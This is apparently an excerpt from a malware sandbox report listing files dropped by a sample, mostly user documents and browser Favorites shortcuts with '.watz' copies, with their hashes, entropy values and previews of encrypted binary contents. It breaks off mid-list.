SHA-256:	D816F8D7911C448E4C43BD59554E0DA21BE6C1D1C8B07AAFBF44AC0176A2C9DD
SHA-512:	7AB5E8D59E913A5279F76081F7600F7B9C37A83D4831B47F2CA4A3A32AF6360D64DFC314E3AF2F5754C1D132CEC9514BDECFAE8D748E377C49EC435E8B8C82B4
Malicious:	false
Preview:	VLZDG`.D7.....30....}.\...r..u.f......`E;.n....g.q..x.1T.f(h.....V..)D......`..p.. ........0...P...[.+..H..G.b~cpo......j......2`..m.u../f'`......d."6.m.aDa..v....L.6.....}S..p...)b.>...l......"%.TJ..4.>r............&.....-Z..I~..%W].mnN.....U.u.,k.0z....I.5......Oz.<..%...M.@].O..&-.).7.o..5..+.;-............U...-.....i.'#....r0]5-...B....>.p...E..c.K?.W.5M0$N..7.KbNea....O...u.%..#....(.....f...,.b..j.}.}.P<....\|.>..}V... #9.eS{.'.....%.OT.../j.......`.s.1]UV.=C .mfgz./.m.b...j...W.s\.>r.....K..>............^..b...)8.R........j.a..Gc.s.Q.8.AcZ.....D:.....H.......O..:.}..V......UXt....O.....9..B.w.+k.1ga1.c....w..t.fr..G...U[%.PQ.vs.$..Wp.:Gr.K..L.......9m...{...L9...Lh...U.c..i..u_..8.T.....h...A..j.....N.A.u.%.. ....<.\|/,k..PAKV.. H...8(Y".d\|...0.t..:.r.VP.LzX<......C(...3.%....G.i...v.W.F3.#\v...Va.qF...-...W..o...?..t.!.......P.}.<..Vd%?..3oX}.{.&.e.....6B..v.:...S.t.@:Y.O...7...T....$.....0X...G..B..+l.C.I\:.Wd.:B.-......*.y.

C:\Users\user\Downloads\VLZDGUKUTZ.xlsx.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.830985435418595
Encrypted:	false
SSDEEP:	24:jog1T/+KHB2xhPtjb0fKA5aOoE/OEFdaaquz+AtLApR7+gm5kedWVraVwXKvGGjX:p1TGa2z5b0f4s/Fyu6aA4lOraVwXKLD
MD5:	CB3221A2C433F711A98E40E6DB5D6204
SHA1:	92736EF67BCF27577589E8E60E565C882FFE150F
SHA-256:	D816F8D7911C448E4C43BD59554E0DA21BE6C1D1C8B07AAFBF44AC0176A2C9DD
SHA-512:	7AB5E8D59E913A5279F76081F7600F7B9C37A83D4831B47F2CA4A3A32AF6360D64DFC314E3AF2F5754C1D132CEC9514BDECFAE8D748E377C49EC435E8B8C82B4
Malicious:	false
Preview:	VLZDG`.D7.....30....}.\...r..u.f......`E;.n....g.q..x.1T.f(h.....V..)D......`..p.. ........0...P...[.+..H..G.b~cpo......j......2`..m.u../f'`......d."6.m.aDa..v....L.6.....}S..p...)b.>...l......"%.TJ..4.>r............&.....-Z..I~..%W].mnN.....U.u.,k.0z....I.5......Oz.<..%...M.@].O..&-.).7.o..5..+.;-............U...-.....i.'#....r0]5-...B....>.p...E..c.K?.W.5M0$N..7.KbNea....O...u.%..#....(.....f...,.b..j.}.}.P<....\|.>..}V... #9.eS{.'.....%.OT.../j.......`.s.1]UV.=C .mfgz./.m.b...j...W.s\.>r.....K..>............^..b...)8.R........j.a..Gc.s.Q.8.AcZ.....D:.....H.......O..:.}..V......UXt....O.....9..B.w.+k.1ga1.c....w..t.fr..G...U[%.PQ.vs.$..Wp.:Gr.K..L.......9m...{...L9...Lh...U.c..i..u_..8.T.....h...A..j.....N.A.u.%.. ....<.\|/,k..PAKV.. H...8(Y".d\|...0.t..:.r.VP.LzX<......C(...3.%....G.i...v.W.F3.#\v...Va.qF...-...W..o...?..t.!.......P.}.<..Vd%?..3oX}.{.&.e.....6B..v.:...S.t.@:Y.O...7...T....$.....0X...G..B..+l.C.I\:.Wd.:B.-......*.y.

C:\Users\user\Downloads\WUTJSCBCFX.pdf

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8383682199100155
Encrypted:	false
SSDEEP:	24:9nbnq87Vldd+Qqb4XM9j6o6m2KooBAqJ902HDmWpOtTrbrjHTE+VbD:FnP7VldY/+o6m2ABAgozrDTE+FD
MD5:	A638F128A1607EDC6CF6C22DBDA76AF9
SHA1:	2019C032E58F586D31A9DE22910BE7BC65DE294E
SHA-256:	07899AA94362E4D516CD78001A30AA45B5DC639C75DBA304E81B973A854FD462
SHA-512:	39FDC8FF4F2F178061A3B6A61BBBEFB55E3AA1B0140E848552474097A1F5A9C969072FAAA1194EE97AC93F250FDE66DCF00A06444FED129F400C1322E6AB32F1
Malicious:	false
Preview:	WUTJS....~..@...G^Sx.l/be./.i..4......3..M.D.".<...mJjJ..\|......e....R.Y..Y..30p.C..0...r}i.a.u.+]btdm....M..X#.T.#3e.q..%../........D..,M...QO.^..4Ba.h..q.`.p.,..l.v.cF..xY.../...e....1...-q.o...BB.%.W..3.............Tt...:.}......).ONy.i..-...!".s......xp.b...(=SZ.\|E<CK..J....b.....q.....^..6.e.l...z5.K0'.<..A+.h.....c>.#s>..Z.6....6/...<....d.An......R............\.G..51.h......B......B.D.U...am....3.;.R..j@...l.C5[.r9....Zd$O.=.\|..Z..4K...jp../.E..b.ey....x..o......n.0.7V4.'..j.-..O....s..[lK...A....=[.....%..y.Q.l.......g..o.8`.....t.o.h......q.D...$..cb..Js......;..T.....e%...qq.:......(b...k....[IN...H...L..t.`.....[.>....=9..E.._...Z.^T....CXL....G.-.3.cR....9.......}..kuV..TQ......;P......@^...}...S3v...Y?..X.A.....y>...6.d2v.........P..<.?..{.:..Ol..Pq..(..h...f.jv..Z.............J.`...Qq.../P.3u.'i.n..].Ea....YMk..;K...,.<v...J.M.... ..p8.F....8a('....\|.4.5.KY.v$x...../uY.]0.I.rg.......K.e...&k.........9l.F.-.ef.B..h.. A...

C:\Users\user\Downloads\WUTJSCBCFX.pdf.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8383682199100155
Encrypted:	false
SSDEEP:	24:9nbnq87Vldd+Qqb4XM9j6o6m2KooBAqJ902HDmWpOtTrbrjHTE+VbD:FnP7VldY/+o6m2ABAgozrDTE+FD
MD5:	A638F128A1607EDC6CF6C22DBDA76AF9
SHA1:	2019C032E58F586D31A9DE22910BE7BC65DE294E
SHA-256:	07899AA94362E4D516CD78001A30AA45B5DC639C75DBA304E81B973A854FD462
SHA-512:	39FDC8FF4F2F178061A3B6A61BBBEFB55E3AA1B0140E848552474097A1F5A9C969072FAAA1194EE97AC93F250FDE66DCF00A06444FED129F400C1322E6AB32F1
Malicious:	false
Preview:	WUTJS....~..@...G^Sx.l/be./.i..4......3..M.D.".<...mJjJ..\|......e....R.Y..Y..30p.C..0...r}i.a.u.+]btdm....M..X#.T.#3e.q..%../........D..,M...QO.^..4Ba.h..q.`.p.,..l.v.cF..xY.../...e....1...-q.o...BB.%.W..3.............Tt...:.}......).ONy.i..-...!".s......xp.b...(=SZ.\|E<CK..J....b.....q.....^..6.e.l...z5.K0'.<..A+.h.....c>.#s>..Z.6....6/...<....d.An......R............\.G..51.h......B......B.D.U...am....3.;.R..j@...l.C5[.r9....Zd$O.=.\|..Z..4K...jp../.E..b.ey....x..o......n.0.7V4.'..j.-..O....s..[lK...A....=[.....%..y.Q.l.......g..o.8`.....t.o.h......q.D...$..cb..Js......;..T.....e%...qq.:......(b...k....[IN...H...L..t.`.....[.>....=9..E.._...Z.^T....CXL....G.-.3.cR....9.......}..kuV..TQ......;P......@^...}...S3v...Y?..X.A.....y>...6.d2v.........P..<.?..{.:..Ol..Pq..(..h...f.jv..Z.............J.`...Qq.../P.3u.'i.n..].Ea....YMk..;K...,.<v...J.M.... ..p8.F....8a('....\|.4.5.KY.v$x...../uY.]0.I.rg.......K.e...&k.........9l.F.-.ef.B..h.. A...

C:\Users\user\Downloads\YPSIACHYXW.png

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.853541983882988
Encrypted:	false
SSDEEP:	24:8K3dd5FYuBoSjcsrZXQl9gaB4VKxs3ZM1Epohvb20g8HFrngayneqGNY+lE7bD:8udd5FloSjvgldB4eqSFb20gaFJeUY+E
MD5:	8160C832FD31D681F596B99F9F03ADB2
SHA1:	0180F47236AF8DE886EC3BF7FA6763BBB1001F59
SHA-256:	7BE422FC73FE53C7BD5B5B17342DE8472C5499C4F5A1AFDC74934D5C1DD7E318
SHA-512:	612126859205DA62434E4935BDB5A5C7C90C012F094EF5A125A70B90F39B74121EFBE30762205F1414CA79E9DB20CA7E7A922C83B1C9995E56A47A2731BFC314
Malicious:	false
Preview:	YPSIA......]W...!.,c.....@+.6.^.~2.O.)..n.9.b.c.A_..B..;z..t\.i?....(.t..\|..N...m..T...fM.u.....>..a..T....F.dFm.........8sj..b....w..683.......f.F.&.F.#....g...7;x..3...f.6..CY.uj.\\|j......`...+.'..C..r.0....... Ze..1.........+.R.mK..X...H6.k$..A.w..m...b...\.....y.{_.iS........l........e.F.s...E...{...V.._...8.f.C.p..f.......G.....<W..u...>........_.....5.[..h.{K.`......?U?.k......]..:......d..zG.3...t..(a..i..90HF.1}RHZ...{J,s...2>..../.w5....~...C..jo..u..?.q..!i..5o.A-.F.?.......,....u>...I...54w.v.R.(.j.].........gy7.l2.E<..w.....f...sZ...n..........x..lu..Q.o..#:,..g...J.~.6...7..N.#..]>.....o-2....9....Cz./L..E......9.....k......5.~...k.u...m.x!...B...+?,Oc.N..Us;..!7...^U....."7H....).U.z....>.L..E-`.cA.Bi.^..oK.....\%...D..m.F..&a......"......M...0VE..+.f..I7.h...V..HA..-.Dj..w.^O.y.s.B..D]..Q.%.&......D....t....in...ox.."..0.V..;..f.o..s.U.o.....g.......UcT0.x....gI\|=.Ky....KpfJC.o...V].Te...ci...r.u....2\| .:.e

C:\Users\user\Downloads\YPSIACHYXW.png.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.853541983882988
Encrypted:	false
SSDEEP:	24:8K3dd5FYuBoSjcsrZXQl9gaB4VKxs3ZM1Epohvb20g8HFrngayneqGNY+lE7bD:8udd5FloSjvgldB4eqSFb20gaFJeUY+E
MD5:	8160C832FD31D681F596B99F9F03ADB2
SHA1:	0180F47236AF8DE886EC3BF7FA6763BBB1001F59
SHA-256:	7BE422FC73FE53C7BD5B5B17342DE8472C5499C4F5A1AFDC74934D5C1DD7E318
SHA-512:	612126859205DA62434E4935BDB5A5C7C90C012F094EF5A125A70B90F39B74121EFBE30762205F1414CA79E9DB20CA7E7A922C83B1C9995E56A47A2731BFC314
Malicious:	false
Preview:	YPSIA......]W...!.,c.....@+.6.^.~2.O.)..n.9.b.c.A_..B..;z..t\.i?....(.t..\|..N...m..T...fM.u.....>..a..T....F.dFm.........8sj..b....w..683.......f.F.&.F.#....g...7;x..3...f.6..CY.uj.\\|j......`...+.'..C..r.0....... Ze..1.........+.R.mK..X...H6.k$..A.w..m...b...\.....y.{_.iS........l........e.F.s...E...{...V.._...8.f.C.p..f.......G.....<W..u...>........_.....5.[..h.{K.`......?U?.k......]..:......d..zG.3...t..(a..i..90HF.1}RHZ...{J,s...2>..../.w5....~...C..jo..u..?.q..!i..5o.A-.F.?.......,....u>...I...54w.v.R.(.j.].........gy7.l2.E<..w.....f...sZ...n..........x..lu..Q.o..#:,..g...J.~.6...7..N.#..]>.....o-2....9....Cz./L..E......9.....k......5.~...k.u...m.x!...B...+?,Oc.N..Us;..!7...^U....."7H....).U.z....>.L..E-`.cA.Bi.^..oK.....\%...D..m.F..&a......"......M...0VE..+.f..I7.h...V..HA..-.Dj..w.^O.y.s.B..D]..Q.%.&......D....t....in...ox.."..0.V..;..f.o..s.U.o.....g.......UcT0.x....gI\|=.Ky....KpfJC.o...V].Te...ci...r.u....2\| .:.e

C:\Users\user\Favorites\Amazon.url

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.430751018804706
Encrypted:	false
SSDEEP:	12:tugha67UlXfz9+qUv7j0+Owukj+SPf+1+cii9a:tZa5wn0GjjvPtbD
MD5:	D7E21CA612B180E4AA8BD82EC5A34E60
SHA1:	59C7E76ED700598F56BC27ED1A2D6411EFC2F6F9
SHA-256:	E9491BB8CCFA6E105FF287A4475706C60B130B802BB2157BA339A2E1C94E6BC4
SHA-512:	1588C7E931AB3BAEE51A96796070FF20050D6AF7BBD6A4AB128EDFEE015A4C064574034204B069FDA54C53FA82037EA4E5466558E0DADBF5581173C01BB41351
Malicious:	false
Preview:	[{000'.........L&fqm......Y.....I..............;.....{..!Dj/)m.D....%<A.!oC..zk..A.:)A...K..g......='.z..\|=...}{N?...j..9....8.,i..z7MbsK.e..p......<x."_U.=.2.....c<...jj.D....]..<>...wj.J...cIB..Eh.RW.}.F.y..[...`i.F..;...?..S..U....U.w.a..K../.Eo.zn..1....g.sQ-7..6.....XM....oX;...1\|.m...A......m...L.,G....{..X.OUn...j.#...I.V.?._.X..>.&.LW.JSLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Amazon.url.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.430751018804706
Encrypted:	false
SSDEEP:	12:tugha67UlXfz9+qUv7j0+Owukj+SPf+1+cii9a:tZa5wn0GjjvPtbD
MD5:	D7E21CA612B180E4AA8BD82EC5A34E60
SHA1:	59C7E76ED700598F56BC27ED1A2D6411EFC2F6F9
SHA-256:	E9491BB8CCFA6E105FF287A4475706C60B130B802BB2157BA339A2E1C94E6BC4
SHA-512:	1588C7E931AB3BAEE51A96796070FF20050D6AF7BBD6A4AB128EDFEE015A4C064574034204B069FDA54C53FA82037EA4E5466558E0DADBF5581173C01BB41351
Malicious:	false
Preview:	[{000'.........L&fqm......Y.....I..............;.....{..!Dj/)m.D....%<A.!oC..zk..A.:)A...K..g......='.z..\|=...}{N?...j..9....8.,i..z7MbsK.e..p......<x."_U.=.2.....c<...jj.D....]..<>...wj.J...cIB..Eh.RW.}.F.y..[...`i.F..;...?..S..U....U.w.a..K../.Eo.zn..1....g.sQ-7..6.....XM....oX;...1\|.m...A......m...L.,G....{..X.OUn...j.#...I.V.?._.X..>.&.LW.JSLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Bing.url

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	542
Entropy (8bit):	7.5906915878735255
Encrypted:	false
SSDEEP:	12:j5WCe0nsQtxof8Jqw0nZAVczk4zQa8acxuj2Lhm41gAC1B1+cii9a:j5FTqwuCVcIqQztkyLTu16bD
MD5:	85FEF8D53683A2C9E50C0FE25F0C0017
SHA1:	64639F49B19465879149939ACCD997EDCDC96AD1
SHA-256:	CF15FAED801BB124CAD25794EF8B325F9BF664264A3954BEFB1686821FEEEE50
SHA-512:	ACFCC3B785EDDB45FF9CA41C6800810E22881D8E5A37DF28CD6B59BC6ED77F21D86658754C76C30BAE8F192E4241DE88C48BE03C804D56E191B1A51051B9BE93
Malicious:	false
Preview:	[{000-J..;n_b..A.M..`.....f...m.B/].-$\|..>...}......H.5t.d.:c......../\.S.L.N..Bg'..x/s..1....G...........b..m..+.....q..7..j"}...X.7.0w^..?.}.5d.....y.f.).2ukIW.o.n............>(\|.6..~TeZ.....S...c.B>..j.$3...^.#......0..qC.....}.T.}0.F...(.La.S........01...[.....<...;....&....~...-."_...d.M..V.~.../r...'....8...}..'.5r.7......\.9..[.b.....{.....rI.Ig..79Z.9.aD.D.P...yP.........Q.*.G..8q....1.G^.`.....).'?yI....?.......Z......&..m...SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Bing.url.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	542
Entropy (8bit):	7.5906915878735255
Encrypted:	false
SSDEEP:	12:j5WCe0nsQtxof8Jqw0nZAVczk4zQa8acxuj2Lhm41gAC1B1+cii9a:j5FTqwuCVcIqQztkyLTu16bD
MD5:	85FEF8D53683A2C9E50C0FE25F0C0017
SHA1:	64639F49B19465879149939ACCD997EDCDC96AD1
SHA-256:	CF15FAED801BB124CAD25794EF8B325F9BF664264A3954BEFB1686821FEEEE50
SHA-512:	ACFCC3B785EDDB45FF9CA41C6800810E22881D8E5A37DF28CD6B59BC6ED77F21D86658754C76C30BAE8F192E4241DE88C48BE03C804D56E191B1A51051B9BE93
Malicious:	false
Preview:	[{000-J..;n_b..A.M..`.....f...m.B/].-$\|..>...}......H.5t.d.:c......../\.S.L.N..Bg'..x/s..1....G...........b..m..+.....q..7..j"}...X.7.0w^..?.}.5d.....y.f.).2ukIW.o.n............>(\|.6..~TeZ.....S...c.B>..j.$3...^.#......0..qC.....}.T.}0.F...(.La.S........01...[.....<...;....&....~...-."_...d.M..V.~.../r...'....8...}..'.5r.7......\.9..[.b.....{.....rI.Ig..79Z.9.aD.D.P...yP.........Q.*.G..8q....1.G^.`.....).'?yI....?.......Z......&..m...SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Facebook.url

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	447
Entropy (8bit):	7.434834724322916
Encrypted:	false
SSDEEP:	12:rubOXZzCNKQSV2R8HMrnWhH/h+rM6tIf1/TWnbRn0i8H1+cii9a:rfZlBV2R8sKD6jIfwbR9bD
MD5:	B87B7FCD701BA50B9E4CDA2AFB750DF7
SHA1:	05E3A2089C6784BDC0E94096FB9CCBAC8A702453
SHA-256:	BCFC2087500162850CE4EAF05CDD491C5C1647F421D869C3980DF3A2E7DB4039
SHA-512:	9C4D069A0E07A646686D9CBA10CDB8694E1C7732F60768C94C064A1042E7E66105AB918F7634C664131FD90E78AEC14B51FFDE7E305F3C6281DCA92F616DE032
Malicious:	false
Preview:	[{000..C+.8O..$...[..t,<...iK.{.,!.k.Qi......T5._."PI..~h.2.)..C......@.q..z.-..\..{x[d.$......".n...GTE...A...\.wl...zX.6c..Q.n.......\|D.I........n..t....V.sH...........$.."d.z..Q$.E..@..Q....+JE...dj~....."/.g;=....<..m.ND.+9...p.4.v..p-C.....e\$fg,.....d....5H..z.....`..J#....7......~...5......'...m.A.`P.R..i*.\|G.....J.i..O(..<@'..Z"o...c..jL...xSLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Facebook.url.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	447
Entropy (8bit):	7.434834724322916
Encrypted:	false
SSDEEP:	12:rubOXZzCNKQSV2R8HMrnWhH/h+rM6tIf1/TWnbRn0i8H1+cii9a:rfZlBV2R8sKD6jIfwbR9bD
MD5:	B87B7FCD701BA50B9E4CDA2AFB750DF7
SHA1:	05E3A2089C6784BDC0E94096FB9CCBAC8A702453
SHA-256:	BCFC2087500162850CE4EAF05CDD491C5C1647F421D869C3980DF3A2E7DB4039
SHA-512:	9C4D069A0E07A646686D9CBA10CDB8694E1C7732F60768C94C064A1042E7E66105AB918F7634C664131FD90E78AEC14B51FFDE7E305F3C6281DCA92F616DE032
Malicious:	false
Preview:	[{000..C+.8O..$...[..t,<...iK.{.,!.k.Qi......T5._."PI..~h.2.)..C......@.q..z.-..\..{x[d.$......".n...GTE...A...\.wl...zX.6c..Q.n.......\|D.I........n..t....V.sH...........$.."d.z..Q$.E..@..Q....+JE...dj~....."/.g;=....<..m.ND.+9...p.4.v..p-C.....e\$fg,.....d....5H..z.....`..J#....7......~...5......'...m.A.`P.R..i*.\|G.....J.i..O(..<@'..Z"o...c..jL...xSLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Google.url

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.485878023954658
Encrypted:	false
SSDEEP:	12:YXSA6IU9SUbMQKkp5kXYyOW4/WfiV5WzxvO9b6hNz1+cii9a:OebMCpaYyoWqV5x+gbD
MD5:	0F34EF6BB1D5358D2728C7523E2E0F29
SHA1:	18A1C978563D4409609468FB5165977662E34B65
SHA-256:	04F5ECC78D8164E6831EE15BB1AEEE7FCB29C9DE373981B1F3EFA1869B9DFDBA
SHA-512:	657F289D7E7C1623FE770AE2F15C2BC44231114AF892B0B797647A1459780FE5A9A6AD88E6C8843227AC3264FB4B6A3578410345E1904CE62A2A1FD0A143809C
Malicious:	false
Preview:	[{000....v...X.p..C1....`....gP$...(.Q....._.5H,.hL...N...p..F....e[.%..O+Y.`.jb..m.D.....{.uLt...r...'yM{.K.......mT...-%.......wa....E...M.W.......~.Y\.^....I....B.p.p..!P.:;x%`....o..)S,.J.:....zd.4G..=J..S....Vb...]`.....Fp.........Y..-] N..f3..t$.E....r....>..KV._......z..^t.1U2?..5...u..2T.~Q/.[..k.v.Lc.w..m.A..S..Nr$jmF....p<.1.r.U<....z....SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Google.url.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.485878023954658
Encrypted:	false
SSDEEP:	12:YXSA6IU9SUbMQKkp5kXYyOW4/WfiV5WzxvO9b6hNz1+cii9a:OebMCpaYyoWqV5x+gbD
MD5:	0F34EF6BB1D5358D2728C7523E2E0F29
SHA1:	18A1C978563D4409609468FB5165977662E34B65
SHA-256:	04F5ECC78D8164E6831EE15BB1AEEE7FCB29C9DE373981B1F3EFA1869B9DFDBA
SHA-512:	657F289D7E7C1623FE770AE2F15C2BC44231114AF892B0B797647A1459780FE5A9A6AD88E6C8843227AC3264FB4B6A3578410345E1904CE62A2A1FD0A143809C
Malicious:	false
Preview:	[{000....v...X.p..C1....`....gP$...(.Q....._.5H,.hL...N...p..F....e[.%..O+Y.`.jb..m.D.....{.uLt...r...'yM{.K.......mT...-%.......wa....E...M.W.......~.Y\.^....I....B.p.p..!P.:;x%`....o..)S,.J.:....zd.4G..=J..S....Vb...]`.....Fp.........Y..-] N..f3..t$.E....r....>..KV._......z..^t.1U2?..5...u..2T.~Q/.[..k.v.Lc.w..m.A..S..Nr$jmF....p<.1.r.U<....z....SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Live.url

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	443
Entropy (8bit):	7.4155830367917135
Encrypted:	false
SSDEEP:	12:2VYJP8xAH5tcN548eM+DEpqDEBo1+cii9a:Vd8nze9w/BDbD
MD5:	92F8B486A478AB1C741B4397A01CACAE
SHA1:	3C66F04ABCFDEAE3B1ECF38CEEB966656C65A4DC
SHA-256:	2730059086A0DE1EB24635C72625D0BB4EBFA798E10420EBC3FE9682B16F495E
SHA-512:	1D6E0C5DF710C93AF90880C6ED0B550E698B509FDE25505BC7D69E7F741C9CD42F9AD462DDC0891E1F4CC8036786CAE22A7458F1E329FDB031D26AC069148EEE
Malicious:	false
Preview:	[{000^....E...7..{./.j...f...(&.....3.HL`.ArU............{.{.N.....V!..:.._.{<...a..._......)._\O.L</.F'.B...lB..rUeP..>...t..^.(h.[.Y>F.MSq....x..D56fuc. ..~..F.F....T...m...:..}n......-.e... ...&.?].0.}Z.?.Lk\).E..Q....F..[......7..hNs....A.....x....=.....Wa.....n./}.=..?l...9.......\..0.V./l.....P...WT.B.....\..O~...#Z-.+bXg.\.5H.c+]...W.J.SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Live.url.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	443
Entropy (8bit):	7.4155830367917135
Encrypted:	false
SSDEEP:	12:2VYJP8xAH5tcN548eM+DEpqDEBo1+cii9a:Vd8nze9w/BDbD
MD5:	92F8B486A478AB1C741B4397A01CACAE
SHA1:	3C66F04ABCFDEAE3B1ECF38CEEB966656C65A4DC
SHA-256:	2730059086A0DE1EB24635C72625D0BB4EBFA798E10420EBC3FE9682B16F495E
SHA-512:	1D6E0C5DF710C93AF90880C6ED0B550E698B509FDE25505BC7D69E7F741C9CD42F9AD462DDC0891E1F4CC8036786CAE22A7458F1E329FDB031D26AC069148EEE
Malicious:	false
Preview:	[{000^....E...7..{./.j...f...(&.....3.HL`.ArU............{.{.N.....V!..:.._.{<...a..._......)._\O.L</.F'.B...lB..rUeP..>...t..^.(h.[.Y>F.MSq....x..D56fuc. ..~..F.F....T...m...:..}n......-.e... ...&.?].0.}Z.?.Lk\).E..Q....F..[......7..hNs....A.....x....=.....Wa.....n./}.=..?l...9.......\..0.V./l.....P...WT.B.....\..O~...#Z-.+bXg.\.5H.c+]...W.J.SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\NYTimes.url

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.480550938251101
Encrypted:	false
SSDEEP:	12:tr5hz7bpTZfGl1TlZAE3XfGFBLB1+cii9a:HhPOl1TsEmObD
MD5:	B34253A5A45FBBEFD022CD6210DF521D
SHA1:	B96AD326EA74838D2A701A30AD68CEEAF31B2C8E
SHA-256:	603BC4C5CB1FF57A4949F348857B39E97D473F87C8DD7C748A49F80B9CC44402
SHA-512:	567C29F496A3CC2B091E73DF7180A5D67C68290E55DA03B74C58D221C5BF28C8491689E279E64B807FF52550C16BBB4AD7352FF67BCFB3A603815C1EFE6F5CD4
Malicious:	false
Preview:	[{000.I,7.A..M-mo.o.N.u...As..t..bjih>..](....+.z...t...w.8........A..I.P.,...9.r$......Z....J...+Y.!.@.>...\..d.KlBP..Z../.v"..=..\|~K!..o..'.*......N,.f.A..z...P.{..Fe&`.E.>.f.)E.T..q.v...7b..A.G....G.\...=.i..a..t.U+.s.CC...Ab....y.@..m..`..<.d...4.K>. .h..._g..."i.4..%...sH...f..y.....f.K.-..a.,J.L.......=._....Pu........A...{a...:.......?.!).XY..SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\NYTimes.url.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.480550938251101
Encrypted:	false
SSDEEP:	12:tr5hz7bpTZfGl1TlZAE3XfGFBLB1+cii9a:HhPOl1TsEmObD
MD5:	B34253A5A45FBBEFD022CD6210DF521D
SHA1:	B96AD326EA74838D2A701A30AD68CEEAF31B2C8E
SHA-256:	603BC4C5CB1FF57A4949F348857B39E97D473F87C8DD7C748A49F80B9CC44402
SHA-512:	567C29F496A3CC2B091E73DF7180A5D67C68290E55DA03B74C58D221C5BF28C8491689E279E64B807FF52550C16BBB4AD7352FF67BCFB3A603815C1EFE6F5CD4
Malicious:	false
Preview:	[{000.I,7.A..M-mo.o.N.u...As..t..bjih>..](....+.z...t...w.8........A..I.P.,...9.r$......Z....J...+Y.!.@.>...\..d.KlBP..Z../.v"..=..\|~K!..o..'.*......N,.f.A..z...P.{..Fe&`.E.>.f.)E.T..q.v...7b..A.G....G.\...=.i..a..t.U+.s.CC...Ab....y.@..m..`..<.d...4.K>. .h..._g..."i.4..%...sH...f..y.....f.K.-..a.,J.L.......=._....Pu........A...{a...:.......?.!).XY..SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Reddit.url

Download File

